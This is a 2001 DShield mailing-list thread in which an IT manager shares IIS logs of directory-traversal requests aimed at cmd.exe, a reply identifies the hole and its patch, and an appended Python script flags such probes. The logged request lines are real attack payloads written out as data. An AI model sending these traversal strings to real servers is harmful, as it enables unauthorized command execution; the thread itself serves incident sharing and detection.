[Dshield] Check this out.

Stephen Carr scarr at BASTYR.EDU
Tue Aug 21 15:28:18 GMT 2001


This is another known security hole in IIS that Microsoft put a patch out
for in May some time. This was one of the earlier Chinese hack attempts. Not
as bad as the recent CR stuff because it isn't a worm so it doesn't
multiply. Mostly what this hack does is give the hacker the ability to run a
command prompt with some system rights (not Admin rights). This was
primarily used to change some files around (usually the default web page).
Back in early June this showed up in my IIS logs at least once a day. The
patch is available at
http://www.microsoft.com/technet/security/bulletin/MS01-026.asp

-----Original Message-----
From: Paul Marsh [mailto:pmarsh at nmefdn.org]
Sent: Monday, August 20, 2001 5:30 AM
To: 'Dshield (E-mail)
Subject: [Dshield] Check this out.


This is a welcoming log entry on a Monday Morning.  Anybody else get any of
these babies over the weekend?  It's from CHINANET Shandong province
network.

2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
- - -
2001-08-19 17:41:48 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
- - -
2001-08-19 17:41:48 61.156.28.14 - GET
/scripts/..Á%pc../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:50 61.156.28.14 - GET
/scripts/..À%9v../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:50 61.156.28.14 - GET
/scripts/..À%qf../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:50 61.156.28.14 - GET
/scripts/..Á%8s../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:51 61.156.28.14 - GET
/scripts/..Á
../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:51 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
- - -
2001-08-19 17:41:51 61.156.28.14 - GET /scripts/..o../winnt/system32/cmd.exe
/c+dir 401 80 - - -
2001-08-19 17:41:53 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
- - -
2001-08-19 17:41:53 61.156.28.14 - GET
/scripts/..ðEUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:53 61.156.28.14 - GET
/scripts/..øEUREUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:54 61.156.28.14 - GET
/scripts/..üEUREUREUREUR¯../winnt/system32/cmd.exe /c+dir 401 80 - - -
2001-08-19 17:41:54 61.156.28.14 - GET /winnt/system32/cmd.exe /c+dir 401 80
- - -

Paul M. Marsh
IT Manager
Nellie Mae Education Foundation
Tel. #  781-348-4235
Pager 877-372-1927

www.nmefdn.org
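
An added example, not part of either message in this thread: a small Python triage script that reads log lines in the format quoted above, flags requests that reach for cmd.exe through traversal or odd encodings, and groups them by client address so a served (2xx) probe stands out from the refused 401s. The field order, the reason labels and the sample lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote

# Assumed field order: date time c-ip user method uri-stem uri-query status port ...
LINE_RE = re.compile(
    r"^\d{4}-\d\d-\d\d \d\d:\d\d:\d\d (?P<ip>\S+) \S+ [A-Z]+ "
    r"(?P<stem>\S+) \S+ (?P<status>\d{3}) "
)

SAMPLE = [  # constructed lines in the thread's format; documentation addresses
    "2001-08-19 17:41:48 192.0.2.10 - GET /winnt/system32/cmd.exe /c+dir 401 80 - - -",
    # \u00c1 is the stray high character seen inside the logged /scripts/ paths
    "2001-08-19 17:41:48 192.0.2.10 - GET /scripts/..\u00c1%pc../winnt/system32/cmd.exe /c+dir 401 80 - - -",
    "2001-08-19 17:42:02 198.51.100.7 - GET /default.htm - 200 80 - - -",
    "2001-08-19 17:43:10 203.0.113.5 - GET /winnt/system32/cmd.exe /c+dir 200 80 - - -",
]

def classify(stem):
    """Return the reasons a URI stem looks like a command-shell probe."""
    for _ in range(3):  # undo up to three layers of percent-encoding
        stem = unquote(stem, encoding="latin-1")
    reasons = []
    if re.search(r"cmd\.exe", stem, re.I):
        reasons.append("shell-binary")
    if ".." in stem:
        reasons.append("dot-dot")
    if "%" in stem or any(ord(c) > 0x7E for c in stem):
        reasons.append("odd-encoding")  # undecodable escape or non-ASCII byte
    return reasons

def summarize(lines):
    """Group probe requests by client IP; 'served' flags any 2xx response."""
    report = defaultdict(lambda: {"hits": 0, "reasons": set(), "served": False})
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # header lines, hard-wrapped or damaged records
        reasons = classify(m["stem"])
        if reasons:
            entry = report[m["ip"]]
            entry["hits"] += 1
            entry["reasons"].update(reasons)
            entry["served"] |= m["status"].startswith("2")
    return dict(report)

if __name__ == "__main__":
    for ip, entry in summarize(SAMPLE).items():
        print(ip, entry["hits"], sorted(entry["reasons"]), "SERVED" if entry["served"] else "not served")
```

Records that an e-mail client has hard-wrapped, like several in the quoted log, do not match the pattern and are skipped, so run it against the original log file rather than a pasted copy.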
